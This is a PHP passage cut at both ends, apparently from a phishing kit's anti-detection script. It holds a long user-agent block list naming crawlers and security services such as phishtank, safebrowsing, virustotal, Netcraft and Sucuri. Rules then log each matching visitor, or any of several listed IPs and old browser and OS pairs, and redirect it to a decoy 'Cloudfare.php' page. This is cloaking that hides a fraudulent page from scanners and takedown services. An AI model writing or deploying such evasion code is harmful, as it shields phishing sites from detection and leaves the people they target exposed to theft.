    "Google-Publisher-Plugin",
    "Google-Read-Aloud",
    "Google-SearchByImage",
    "Google-Site-Verification",
    "Google-Structured-Data-Testing-Tool",
    "Google-Transparency-Report",
    "google-xrawler",
    "Google-Youtube-Links",
    "Googlebot",
    "googlebot",
    "GoogleDocs",
    "GoogleHC\/",
    "GoogleProducer",
    "GoogleSites",
    "googletranslate",
    "Gookey",
    "GoScraper",
    "GoSpotCheck",
    "gosquared-thumbnailer",
    "Gotit",
    "GoZilla",
    "grabber",
    "grabify",
    "GrabNet",
    "Grafula",
    "gralon",
    "Grammarly",
    "GrapeFX",
    "GrapeshotCrawler",
    "grapnel",
    "GreatNews",
    "Gregarius",
    "GRequests",
    "griffon",
    "grokkit",
    "grokkit-crawler",
    "gromit",
    "grouphigh",
    "grub",
    "grub-client",
    "gsa-crawler",
    "gSOAP\/",
    "GT::WWW",
    "GTmetrix",
    "gulliver",
    "GuzzleHttp",
    "gvfs\/",
    "HAA(A)?RTLAND http client",
    "Haansoft",
    "hackney\/",
    "Hadi Agent",
    "hamahakki",
    "HappyApps-WebCheck",
    "harvest",
    "Hatena",
    "Havij",
    "havindex",
    "HaxerMen",
    "hbot",
    "headless",
    "HeadlessChrome",
    "HEADMasterSEO",
    "HeartRails_Capture",
    "helix",
    "help@dataminr\.com",
    "heritrix",
    "historious",
    "hkedcity",
    "hku www octopus",
    "hkuwwwoctopus",
    "hledejLevne\.cz",
    "Hloader",
    "HMView",
    "Holmes",
    "homerweb",
    "HonesoSearchEngine",
    "HootSuite Image proxy",
    "Hootsuite-WebFeed",
    "hosterstats",
    "hostinger",
    "HostTracker",
    "hotmail!",
    "hotmail",
    "ht:\/\/check",
    "htdig",
    "html index",
    "htmlgobble",
    "htmlindex",
    "HTMLparser",
    "htmlyse",
    "html_analyzer",
    "HTTP Banner AGENT",
    "Http Crawler",
    "http-get",
    "HTTP-Header-Abfrage",
    "http-kit",
    "http-request\/",
    "HTTP-Tiny",
    "HTTP::Lite",
    "http:\/\/www.neomo.de\/",
    "HttpComponents",
    "httphr",
    "HTTPie",
    "HTTPMon",
    "httpRequest",
    "httpscheck",
    "httpssites_power",
    "httpunit",
    "HttpUrlConnection",
    "http\.rb\/",
    "HTTP_Compression_Test",
    "http_get",
    "http_request2",
    "http_requester",
    "httrack",
    "huaweisymantec",
    "hubater",
    "HubSpot ",
    "Humanlinks",
    "hyper-decontextualizer",
    "i2kconnect\/",
    "ia_archiver",
    "Iblog",
    "ibm_planetwide",
    "ichiro",
    "iconsurf",
    "icoreservice",
    "Id-search",
    "IdeelaborPlagiaat",
    "IDG Twitter Links Resolver",
    "IDwhois\/",
    "Iframely",
    "igdeSpyder",
    "iltrovatore",
    "IlTrovatore",
    "Image Fetch",
    "Image Sucker",
    "image.kapsi.net",
    "ImageEngine\/",
    "imagelock",
    "ImageVisu\/",
    "Imagga",
    "imagineeasy",
    "imgsizer",
    "InAGist",
    "inbound\.li parser",
    "incywincy",
    "InDesign%20CC",
    "indexer",
    "Indy Library",
    "InetURL",
    "infegy",
    "infobee",
    "infohelfer",
    "informant",
    "InfoTekies",
    "InfoWizards Reciprocal Link",
    "ingrid",
    "inktomisearch.com",
    "inpwrd\.com",
    "insights",
    "inspector web",
    "inspectorweb",
    "instabid",
    "instagram",
    "Instapaper",
    "Integrity",
    "integromedb",
    "intelliagent",
    "Intelliseek",
    "InterGET",
    "Internet Ninja",
    "internet shinchakubin",
    "InternetSeer",
    "internetshinchakubin",
    "internetVista monitor",
    "internetwache",
    "internet_archive",
    "intraVnews",
    "IODC",
    "IOI",
    "ip3000",
    "iplabel",
    "ips-agent",
    "IPS\/[0-9]",
    "IPWorks HTTP\/S Component",
    "iqdb\/",
    "Iria",
    "Irokez",
    "iron33",
    "isitup\.org",
    "iskanie",
    "israeli-search",
    "isUp\.li",
    "iThemes Sync\/",
    "ivia",
    "IZaBEE",
    "iZSearch",
    "jabber",
    "jack",
    "JAHHO",
    "jakarta",
    "janforman",
    "Jaunt\/",
    "java",
    "javabee",
    "Jbrofuzz",
    "Jersey\/",
    "jetbot",
    "jetbrains",
    "JetCar",
    "Jigsaw",
    "Jobboerse Crawler ",
    "Jobboerse",
    "JobFeed discovery",
    "Jobg8 URL Monitor",
    "jobo",
    "Jobrapido",
    "Jobsearch1\.5",
    "JoinVision Generic",
    "JolokiaPwn",
    "Joomla",
    "Jorgee",
    "JS-Kit",
    "jumpstation",
    "JustView",
    "Kaspersky Lab CFR link resolver",
    "kaspersky",
    "katipo",
    "kbot",
    "kdd-explorer",
    "Kelny\/",
    "Kerrigan\/",
    "KeyCDN",
    "Keyword Density",
    "Keywords Research",
    "khttp\/",
    "KickFire",
    "kilroy",
    "KimonoLabs\/",
    "Kml-Google",
    "knowledge",
    "knows\.is",
    "KOCMOHABT",
    "kototoi",
    "kouio",
    "Kraken",
    "kretrieve",
    "kube-probe",
    "kubectl",
    "kulturarw3",
    "KumKie",
    "labelgrabber",
    "lachesis",
    "larbin",
    "Larbin",
    "Lavf\/",
    "lbot",
    "LeechFTP",
    "LeechGet",
    "legs",
    "letsencrypt",
    "Lftp",
    "LibVLC",
    "LibWeb",
    "Libwhisker",
    "libwww",
    "Licorne",
    "Liferea\/",
    "Lighthouse",
    "lighthouse",
    "Lightspeedsystems",
    "Likse",
    "Link Valet",
    "link validator",
    "linkalarm",
    "LinkAlarm\/",
    "linkCheck",
    "linkdex",
    "linkdexbot",
    "LinkExaminer",
    "linkfluence",
    "linkpeek",
    "LinkPreviewGenerator",
    "linkscan",
    "LinkScan",
    "LinksManager",
    "LinkTiger",
    "linkvalidator",
    "LinkWalker",
    "link_thumbnailer",
    "Lipperhey",
    "Litemage_walker",
    "livedoor ScreenShot",
    "LoadImpactRload",
    "localsearch-web",
    "lockon",
    "LongURL API",
    "looid\.com",
    "looksystems\.net",
    "lssrocketcrawler",
    "ltx71",
    "lua-resty-http",
    "lwp",
    "lwp-request",
    "lwp-trivial",
    "LWP::Simple",
    "lycos",
    "LYT\.SR",
    "L\.webis",
    "mabontland",
    "Macintosh",
    "Mag-Net",
    "magpie",
    "magpie-crawler",
    "MagpieRSS",
    "MailChimp",
    "Mail\.Ru",
    "Majestic12",
    "majestic12",
    "makecontact\/",
    "Mandrill",
    "mantraagent",
    "mapoftheinternet",
    "MapperCmd",
    "marketinggrader",
    "MarkMonitor",
    "MarkWatch",
    "marvin/",
    "Mass Downloader",
    "masscan\/",
    "Mata Hari",
    "mattie",
    "MaxPointCrawler",
    "mbot",
    "mediafox",
    "Mediametric",
    "mediapartners",
    "Mediapartners-Google",
    "mediawords",
    "MegaIndex\.ru",
    "MeltwaterNews",
    "Melvil Rawi",
    "MemGator",
    "mercator",
    "merlinkbot",
    "merzscope",
    "messagelabs",
    "Metaspinner",
    "MetaURI",
    "metauri.com",
    "MFC_Tear_Sample",
    "Microsearch",
    "Microsoft Data Access",
    "Microsoft Office ",
    "Microsoft Outlook",
    "microsoft url control",
    "Microsoft Windows Network Diagnostics",
    "Microsoft-WebDAV-MiniRedir",
    "microsofturlcontrol",
    "MIDown tool",
    "MIIxpc",
    "Mindjet",
    "Miniature\.io",
    "Miniflux",
    "minirank",
    "Mister PiX",
    "miva",
    "mixdata dot com",
    "mixed-content-scan",
    "Mixmax-LinkPreview",
    "mixnode",
    "mj12",
    "MJ12bot",
    "mnogosearch",
    "Mnogosearch",
    "moget",
    "mogimogi",
    "Mojeek",
    "Mojolicious \(Perl\)",
    "mon.itor.us",
    "monitis",
    "Monitority\/",
    "Monit\/",
    "monster",
    "montastic",
    "MonTools",
    "moose",
    "Moreover",
    "Morfeus Fucking Scanner",
    "Morning Paper",
    "motor",
    "MovableType",
    "mowser",
    "mozilla",
    "Mrcgiguy",
    "MS Web Services Client Protocol",
    "MSFrontPage",
    "mShots",
    "msn!",
    "msn",
    "MSNBot",
    "msnbot",
    "msnbot-media",
    "MuckRack\/",
    "muhstik-scan",
    "multitext",
    "muncher",
    "muscatferret",
    "MVAClient",
    "mwd.search",
    "MxToolbox\/",
    "myweb",
    "nagios",
    "najdi",
    "Najdi\.si",
    "Name Intelligence",
    "nameprotect",
    "Nameprotect",
    "nationaldirectory",
    "Navroad",
    "nazilla",
    "nbot",
    "ncsa beta",
    "ncsabeta",
    "NearSite",
    "nec-meshexplorer",
    "nederland.zoek",
    "Needle",
    "neofonie",
    "Nessus",
    "Net Vampire",
    "NetAnts",
    "netcarta webmap engine",
    "netcartawebmapengine",
    "Netcraft Survey Agent",
    "NETCRAFT",
    "netcraft",
    "NetcraftSurveyAgent",
    "NetLyzer",
    "netmechanic",
    "NetMechanic",
    "NetNewsWire",
    "netpilot",
    "Netpursual",
    "netresearch",
    "netresearchserver",
    "netscoop",
    "NetSeer crawler",
    "NetSeercrawler",
    "NetShelter ContentScan",
    "netsparker",
    "Netsparker",
    "NetSystemsResearch",
    "NetTrack",
    "Netvibes",
    "NetZIP",
    "Neustar WPM",
    "NeutrinoAPI",
    "NewRelicPinger",
    "NewsBlur .*Finder",
    "newscan-online",
    "NewsGator",
    "newsme",
    "newspaper\/",
    "Nexgate Ruby Client",
    "NG-Search",
    "nhse",
    "Nibbler",
    "NICErsPRO",
    "Nikto",
    "nineconnections",
    "NING",
    "NLNZ_IAHarvester",
    "Nmap Scripting Engine",
    "node",
    "node-superagent",
    "node-urllib",
    "Nodemeter",
    "NodePing",
    "node\.io",
    "nokia6682/",
    "nomad",
    "nominet\.org\.uk",
    "nominet\.uk",
    "Norton-Safeweb",
    "Notifixious",
    "notifyninja",
    "NotionEmbedder",
    "noyona",
    "nuhk",
    "nutch",
    "Nuzzel",
    "nWormFeedFinder",
    "nyawc\/",
    "Nymesis",
    "NYU",
    "nzexplorer",
    "objectssearch",
    "obot",
    "occam",
    "Ocelli\/",
    "Octopus",
    "oegp",
    "Offline Explorer",
    "Offline Navigator",
    "og-scraper",
    "OgScrper",
    "okhttp",
    "okhttp/2.5.0",
    "omgili",
    "omni",
    "OMSC",
    "Online Domain Tools",
    "open text",
    "OpenCalaisSemanticProxy",
    "Openfind",
    "openfind",
    "openintelligencedata",
    "OpenLinkProfiler",
    "Openstat\/",
    "opentext",
    "OpenVAS",
    "OPPO A33",
    "Optimizer",
    "orb search",
    "Orbiter",
    "orbsearch",
    "OrgProbe\/",
    "orion-semantics",
    "osis-project",
    "outlook!",
    "outlook",
    "Outlook-Express",
    "Outlook-iOS",
    "Owler",
    "ownCloud News",
    "ow\.ly",
    "OxfordCloudService",
    "p3pwgdsn",
    "pack rat",
    "packrat",
    "page scorer",
    "Page Valet",
    "page2rss",
    "pageboy",
    "pagebull",
    "PageGrabber",
    "PagePeeker",
    "PageScorer",
    "Pagespeed\/",
    "page_verifier",
    "Panopta",
    "panscient",
    "Papa Foto",
    "PaperLiBot",
    "parasite",
    "parsijoo",
    "partnersite",
    "patric",
    "Pavuk",
    "PayPal IPN",
    "paypal",
    "pbot",
    "pcBrowser",
    "Pcore-HTTP",
    "pear.",
    "Pearltrees",
    "PECL::HTTP",
    "peerindex",
    "Peew",
    "pegasus",
    "PeoplePal",
    "PercolateCrawler",
    "peregrinator",
    "Perlu -",
    "pgp key agent",
    "pgpkeyagent",
    "phantom",
    "PhantomJS Screenshoter",
    "PhantomJS",
    "phantomjs",
    "PhantomJS\/",
    "phish",
    "phishtank",
    "Photon\/",
    "phpdig",
    "phpservermon",
    "Pi-Monster",
    "picosearch",
    "Picscout",
    "picsearch",
    "Picsearch",
    "PictureFinder",
    "piltdownman",
    "Pimonster",
    "pimptrain",
    "Pingability",
    "PingAdmin\.Ru",
    "Pingdom",
    "Pingoscope",
    "PingSpot",
    "ping\.blo\.gs",
    "pinpoint",
    "pinterest\.com",
    "pioneer",
    "pipes",
    "piranha",
    "Pixray",
    "Pizilla",
    "Plagger\/",
    "Ploetz \+ Zeller",
    "Plukkie",
    "plumanalytics",
    "plumtreewebaccessor",
    "PocketImageCache",
    "PocketParser",
    "Pockey",
    "POE-Component-Client-HTTP",
    "pogodak",
    "poirot",
    "Polymail\/",
    "Pompos",
    "pompos",
    "poppelsdorf",
    "poppi",
    "popular iconoclast",
    "populariconoclast",
    "Porkbun",
    "Port Monitor",
    "postano",
    "PostmanRuntime",
    "PostPost",
    "postrank",
    "PowerPoint\/",
    "presto",
    "preview",
    "Prevx",
    "Priceonomics Analysis Engine",
    "PrintFriendly",
    "PrintfulBot",
    "PritTorrent",
    "privoxy",
    "Prlog",
    "probethenet",
    "Project 25499",
    "prospectb2b",
    "Protopage",
    "ProWebWalker",
    "proximic",
    "proxy",
    "PRTG Network Monitor",
    "pshtt, https scanning",
    "psycheclone",
    "PTST ",
    "PTST\/[0-9]+",
    "publisher",
    "PulseCrawler",
    "Pulsepoint XT3 web scraper",
    "Pump",
    "pycurl",
    "python",
    "Python-httplib2",
    "python-requests",
    "Python-urllib",
    "Qirina Hurdler",
    "QQDownload",
    "QrafterPro",
    "Qseero",
    "Qualidator",
    "QueryN Metasearch",
    "QuerySeekerSpider",
    "queuedriver",
    "quicklook",
    "Quora Link Preview",
    "Qwantify",
    "R6_CommentReader",
    "R6_FeedFetcher",
    "Radian6",
    "rambler",
    "Rambler",
    "RankActive",
    "RankFlex",
    "RankSonicSiteAuditor",
    "raven search",
    "ravensearch",
    "rbot",
    "Re-re Studio",
    "ReactorNetty",
    "Readability",
    "RealDownload",
    "RealPlayer%20Downloader",
    "RebelMouse",
    "Recorder",
    "RecurPost\/",
    "redback\/",
    "ReederForMac",
    "Reeder\/",
    "ReGet",
    "RepoMonkey",
    "request\.js",
    "reqwest\/",
    "ResponseCodeTest",
    "RestSharp",
    "reverseshorturl",
    "Riddler",
    "Rival IQ",
    "roach",
    "road runner",
    "roadhouse",
    "roadrunner",
    "robbie",
    "robofox",
    "Robosourcer",
    "Robozilla",
    "robozilla",
    "ROI Hunter",
    "RPT-HTTPClient",
    "RSSOwl",
    "ruby",
    "rules",
    "safe-agent-scanner",
    "safebrowsing",
    "safesurfingwidget",
    "SalesIntelligent",
    "Saleslift",
    "salty",
    "samsung-sgh-e250",
    "SAMSUNG-SGH-E250",
    "SauceNAO",
    "sbider",
    "SBIder",
    "sbot",
    "scalaj-http",
    "ScanAlert",
    "scanurl",
    "scan\.lol",
    "scmguard",
    "Scoop",
    "scooter",
    "ScoutJet",
    "scoutjet",
    "ScoutURLMonitor",
    "ScrapeBox Page Scanner",
    "Scrapy",
    "Screaming",
    "ScreenShotService",
    "scrubby",
    "Scrubby",
    "Scrutiny\/",
    "seamonkey",
    "search.",
    "Search37",
    "searchenginepromotionhelp",
    "Searchestate",
    "SearchExpress",
    "SearchmetricsBot",
    "searchprocess",
    "SearchSight",
    "search\.thunderstone",
    "seek",
    "Seeker",
    "semanticdiscovery",
    "semanticjuice",
    "Semiocast HTTP client",
    "Semrush",
    "Sendsay\.Ru",
    "senrigan",
    "sentry\/",
    "SEO Browser",
    "Seo Servis",
    "seo-nastroj\.cz",
    "seo4ajax",
    "Seobility",
    "SEOCentro",
    "SeoCheck",
    "SEOkicks",
    "Seomoz",
    "SEOprofiler",
    "seoscanners",
    "SEOsearch",
    "seositecheckup",
    "SEOstats",
    "servernfo",
    "sexsearcher",
    "Seznam",
    "sg-scout",
    "shaihulud",
    "shark",
    "Shelob",
    "Shodan",
    "Shoppimon",
    "ShopWiki",
    "shopwiki",
    "ShortLinkTranslate",
    "ShowyouBot",
    "shrinktheweb",
    "Sideqik",
    "sidewinder",
    "sift",
    "SiftScience",
    "silk",
    "simmany",
    "simplepie",
    "SimplePie",
    "SimpleScraper",
    "SimplyFast",
    "Siphon",
    "SISTRIX Crawler",
    "SISTRIX",
    "SISTRIXCrawler",
    "site searcher",
    "Site Sucker",
    "site valet",
    "Site-Shot\/",
    "Site24x7",
    "SiteBar",
    "Sitebeam",
    "Sitebulb\/",
    "SiteCondor",
    "SiteExplorer",
    "siteexplorer",
    "SiteGuardian",
    "Siteimprove",
    "SiteIndexed",
    "SiteLockSpider",
    "Sitemap(s)? Generator",
    "SitemapGenerator",
    "SiteMonitor",
    "sitesearcher",
    "Siteshooter B0t",
    "SiteSnagger",
    "SiteSucker",
    "sitetech-rover",
    "SiteTruth",
    "sitevalet",
    "Sitevigil",
    "sitexy\.com",
    "skymob.com",
    "SkypeUriPreview",
    "Slack\/",
    "sleek",
    "slider\.com",
    "Slurp",
    "slurp",
    "SlySearch",
    "SmartDownload",
    "smartwit",
    "SMRF URL Expander",
    "SMUrlExpander",
    "SMXCrawler",
    "sna-",
    "Snake",
    "snappy",
    "Snappy",
    "SnapSearch",
    "Snarfer\/",
    "SniffRSS",
    "sniptracker",
    "snooper",
    "Snoopy",
    "SnowHaze Search",
    "softlayer",
    "Sogou web spider",
    "sogou web",
    "sogou",
    "sogou-test-spider",
    "Sogouwebspider",
    "sohu",
    "sophos",
    "SortSite",
    "Sottopop",
    "sovereign\.ai",
    "SpaceBison",
    "spam",
    "SpamExperts",
    "Spammen",
    "Spanner",
    "spaziodati",
    "spbot",
    "SPDYCheck",
    "Specificfeeds",
    "speedfind",
    "speedy",
    "SPEng",
    "sphere",
    "sphider",
    "spider",
    "Spinn3r",
    "spinner",
    "spray-can",
    "Sprinklr ",
    "spyder",
    "spyonweb",
    "sqlmap",
    "Sqlworm",
    "Sqworm",
    "SSL Labs",
    "ssl-tools",
    "StackRambler",
    "Statastico\/",
    "StatusCake",
    "Steeler",
    "steeler/",
    "Stratagems Kumo",
    "Stroke\.cz",
    "StudioFACA",
    "StumbleUpon",
    "suchen",
    "Sucuri",
    "sucuri.net",
    "suke",
    "summify",
    "suntek",
    "SuperHTTP",
    "supersnooper",
    "surfnomore",
    "Surphace Scout",
    "Suzuran",
    "sven",
    "SwiteScraper",
    "sygol",
    "sylera",
    "Symfony BrowserKit",
    "Symfony2 BrowserKit",
    "SynHttpClient-Built",
    "Sysomos",
    "sysscan",
    "Szukacz",
    "szukacz",
    "t-h-u-n-d-e-r-s-t-o-n-e",
    "t-rex",
    "T0PHackTeam",
    "tach black widow",
    "tachblackwidow",
    "tAkeOut",
    "tarantula",
    "Tarantula\/",
    "Taringa UGC",
    "TarmotGezgin",
    "tbot",
    "telegram",
    "Teleport",
    "Telesoft",
    "Telesphoreo",
    "Telesphorep",
    "templeton",
    "TencentTraveler",
    "Tenon\.io",
    "teoma",
    "terrainformatica",
    "Test Certificate Info",
    "testuri",
    "Tetrahedron",
    "TextRazor Downloader",
    "The Drop Reaper",
    "The Expert HTML Source Viewer",
    "The Intraformant",
    "The Knowledge AI",
    "theinternetrules",
    "TheNomad",
    "theophrastus",
    "Thinklab",
    "Thumbor",
    "Thumbshots",
    "ThumbSniper",
    "timewe\.net",
    "TinEye",
    "Tiny Tiny RSS",
    "titan",
    "titin",
    "tkwww",
    "TLSProbe\/",
    "Toata",
    "topster",
    "tor-exit",
    "torservers",
    "touche\.com",
    "toutatis",
    "Traackr\.com",
    "tracemyfile",
    "Trackuity",
    "translate",
    "TrapitAgent",
    "Trendiction",
    "trendmicro",
    "Trendsmap",
    "trendspottr",
    "Trident",
    "trident",
    "truwoGPS",
    "TryJsoup",
    "TulipChain",
    "Turingos",
    "Turnitin",
    "tutorgig",
    "TweetedTimes Bot",
    "tweetedtimes",
    "TweetedTimesBot",
    "TweetmemeBot",
    "Tweetminster",
    "Tweezler\/",
    "twibble",
    "Twice",
    "twiceler",
    "Twikle",
    "Twingly",
    "Twisted PageGetter",
    "twisted",
    "Twitterbot",
    "Typhoeus",
    "ubermetrics-technologies",
    "ubuntu",
    "uclassify",
    "ucsd",
    "udmsearch",
    "UdmSearch",
    "unchaos",
    "unirest-java",
    "UniversalFeedParser",
    "Unshorten\.It",
    "Untiny",
    "untrusted",
    "UnwindFetchor",
    "updated",
    "updown\.io daemon",
    "Upflow",
    "UptimeRobot",
    "Uptimia",
    "url check",
    "URL Verifier",
    "URLAppendBot",
    "urlcheck",
    "Urlcheckr",
    "URLitor",
    "urlredirectresolver",
    "urlresolver",
    "urlscan",
    "Urlstat",
    "URLTester",
    "UrlTrends Ranking Updater",
    "URLy Warning",
    "URLy\.Warning",
    "Vacuum",
    "vagabondo",
    "Vagabondo",
    "valkyrie",
    "VB Project",
    "vbot",
    "vBSEO",
    "VCI",
    "verticrawl",
    "via ggpht\.com GoogleImageProxy",
    "victoria",
    "VidibleScraper",
    "virus",
    "Virusdie",
    "virustotal",
    "vision-search",
    "visionutils",
    "vkShare",
    "VoidEYE",
    "Voil",
    "VoilaBot",
    "volcano",
    "voltron",
    "voyager-hc",
    "voyager/",
    "voyager\/",
    "VSAgent\/",
    "VSB-TUO\/",
    "Vulnbusters Meter",
    "VYU2",
    "w3af\.org",
    "W3C-checklink",
    "W3C-mobileOK",
    "W3C_Unicorn",
    "w3c_validator",
    "w3m2",
    "w3mir",
    "WAC-OFU",
    "walker",
    "wallpaper",
    "WallpapersHD",
    "Wallpapers\/[0-9]+",
    "wanderer",
    "wangling",
    "Wappalyzer",
    "wapproxy",
    "WatchMouse",
    "wauuu",
    "wavefire",
    "WbSrch\/",
    "WDT\.io",
    "Web Auto",
    "Web Collage",
    "web core",
    "Web Enhancer",
    "Web Fetch",
    "Web Fuck",
    "web hopper",
    "Web Pix",
    "Web Sauger",
    "Web spyder",
    "Web Sucker",
    "web wombat",
    "web-capture\.net",
    "Web-sniffer",
    "Webalta",
    "Webauskunft",
    "WebAuto",
    "webbandit",
    "WebCapture",
    "webcatcher",
    "WebClient\/",
    "webcollage",
    "WebCookies",
    "WebCopier",
    "webcopy",
    "webcore",
    "WebCorp",
    "WebDataStats",
    "WebDoc",
    "WebEnhancer",
    "WebFetch",
    "webfoot",
    "WebFuck",
    "WebGazer",
    "WebGo IS",
    "webhopper",
    "WebImageCollector",
    "WebImages",
    "WebIndex",
    "webkit2png",
    "weblayers",
    "WebLeacher",
    "weblight",
    "weblinker",
    "weblog monitor",
    "weblogmonitor",
    "webmastercoffee",
    "webmirror",
    "webmon ",
    "webmonkey",
    "WebPix",
    "webquest",
    "webreaper",
    "WebReaper",
    "WebSauger",
    "webscreenie",
    "Webshag",
    "Webshot",
    "Website Quester",
    "websitepulse agent",
    "websitepulse",
    "WebsiteQuester",
    "Websnapr",
    "websnarf",
    "WebSniffer",
    "Webster",
    "webstolperer",
    "WebStripper",
    "WebSucker",
    "WebThumbnail",
    "Webthumb\/",
    "webvac",
    "webwalk",
    "webwatch",
    "WebWhacker",
    "webwombat",
    "webzinger",
    "WebZIP",
    "WeLikeLinks",
    "WEPA",
    "WeSEE",
    "wf84",
    "Wfuzz\/",
    "wget",
    "whatsapp",
    "WhatsApp",
    "WhatsMyIP",
    "WhatWeb",
    "WhereGoes\?",
    "Whibse",
    "whizbang",
    "WhoRunsCoinHive",
    "whowhere",
    "Whynder Magnet",
    "wild ferret",
    "wildferret",
    "windows 95",
    "windows 98",
    "Windows XP",
    "windows xp",
    "Windows-RSS-Platform",
    "WindowsPowerShell",
    "WinPodder",
    "wkhtmlto",
    "wmtips",
    "Woko",
    "woorankreview",
    "WordPress\/",
    "WordupinfoSearch",
    "Word\/",
    "woriobot",
    "worldlight",
    "worldping-api",
    "wotbox",
    "WP Engine Install Performance API",
    "wpif",
    "wprecon\.com survey",
    "WPScan",
    "wscheck",
    "Wtrace",
    "WWW-Collector-E",
    "WWW-Mechanize",
    "WWW::Document",
    "WWW::Mechanize",
    "wwwc",
    "WWWOFFLE",
    "wwwster",
    "www\.monitor\.us",
    "x09Mozilla",
    "X11",
    "x22Mozilla",
    "XaxisSemanticsClassifier",
    "Xenu Link Sleuth",
    "xenu",
    "xget",
    "xift",
    "XING-contenttabreceiver",
    "xirq",
    "xpymep([0-9]?)\.exe",
    "Y!J-(ASR|BSC)",
    "Y!J-BRW",
    "Yaanb",
    "yacy",
    "Yahoo Link Preview",
    "Yahoo! Slurp",
    "yahoo!",
    "Yahoo!Slurp",
    "yahoo",
    "YahooCacheSystem",
    "YahooSeeker",
    "yahooSeeker",
    "YahooYSMcm",
    "YandeG",
    "yandex",
    "Yandex",
    "Yandex(?!Search)",
    "yandexbot",
    "yandexBot",
    "YandexBot",
    "yanga",
    "ybot",
    "yeti",
    "Yo-yo",
    "yodao",
    "Yoleo Consumer",
    "yoogliFetchAgent",
    "YottaaMonitor",
    "YoudaoBot",
    "Your-Website-Sucks",
    "yourls\.org",
    "YoYs\.net",
    "YP\.PL",
    "Y\!J-BRW",
    "Zabbix",
    "Zade",
    "Zao",
    "zao/",
    "Zauba",
    "zbot",
    "Zemanta Aggregator",
    "Zend\\Http\\Client",
    "Zend_Http_Client",
    "Zermelo",
    "Zeus ",
    "zgrab",
    "zipcommander",
    "zippp",
    "ZnajdzFoto",
    "ZnHTTP",
    "zteopen",
    "zyborg",
    "^Amazon Simple Notification Service Agent$",
    "^COMODO DCV",
    "^DangDang",
    "^DavClnt",
    "^FDM ",
    "^git\/",
    "^Goose\/",
    "^Grabber",
    "^HTTPClient\/",
    "^Java\/",
    "^Jeode\/",
    "^Jetty\/",
    "^Mail\/",
    "^Mget",
    "^Microsoft URL Control",
    "^NG\/[0-9\.]",
    "^NING\/",
    "^PHP\/[0-9]",
    "^RMA\/",
    "^Ruby|Ruby\/[0-9]",
    "^VSE\/[0-9]",
    "^WordPress\.com",
    "^XRL\/[0-9]",
    "^ZmEu",
    "_bot");
foreach ($blocked_words2 as $word2) {
    if (stripos($ua, $word2)) {
        logger($word2, "BOT AGENT");
        die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
    }
}
$br = getBrowser();
$os = getOS();
$v_agent = $_SERVER["HTTP_USER_AGENT"];
if ($v_agent == "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" || $v_agent == "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)") {
    logger($v_agent, "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($v_agent == "CheckMarkNetwork/1.0 (+http://www.checkmarknetwork.com/spider.html)") {
    logger($v_agent, "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($v_agent == "Mozilla/5.0 (compatible; TTD-Content; +https://www.thetradedesk.com/general/ttd-content)") {
    logger($v_agent, "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($v_agent == "Baiduspider+(+http://www.baidu.com/search/spider.htm)") {
    logger($v_agent, "BAIDU BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($v_agent == "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1) VoilaBot BETA 1.2 (support.voilabot@orange-ftgroup.com)") {
    logger($v_agent, "ORANGE BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($v_agent == "Mozilla/5.0 (compatible; adscanner/)") {
    logger($v_agent, "ADS BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($v_agent == "BUbiNG (+http://law.di.unimi.it/BUbiNG.html#wc)") {
    logger($v_agent, "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($v_agent == "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)") {
    logger($v_agent, "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($br == "Internet Explorer" && stripos($_SERVER["HTTP_USER_AGENT"], $word2) !== false) {
    logger($word2, "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if (getIp() == "92.23.57.168" or getIp() == "96.31.1.4" or getIp() == "207.96.148.8") {
    logger(getIp(), "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Windows Server 2003/XP x64" and $br == "Firefox") {
    logger("{$os} | {$br}", "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Windows 7" and $br == "Firefox") {
    logger("{$os} | {$br}", "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Windows XP" and $br == "Firefox") {
    logger("{$os} | {$br}", "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Windows XP" and $br == "Internet Explorer") {
    logger("{$os} | {$br}", "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Windows XP" and $br == "Chrome") {
    logger("{$os} | {$br}", "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Windows Vista" and $br == "Internet Explorer") {
    logger("{$os} | {$br}", "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Windows Vista" or $os == "Ubuntu" or $os == "Chrome OS" or $os == "BlackBerry" or $os == "Linux"
    && stripos($_SERVER["HTTP_USER_AGENT"], $word2) !== false) {
    logger("{$br} | {$word2}", "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($br == "Unknown Browser") {
    logger($br, "UNKNOWN BROWSER");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Windows 2000") {
    logger($os, "BOT AGENT");
    die(header("Location: Cloudfare.php?id=".md5(uniqid(rand(), true))));
}
if ($os == "Unknown OS") {
    logger($br, "UNKNOWN OS");
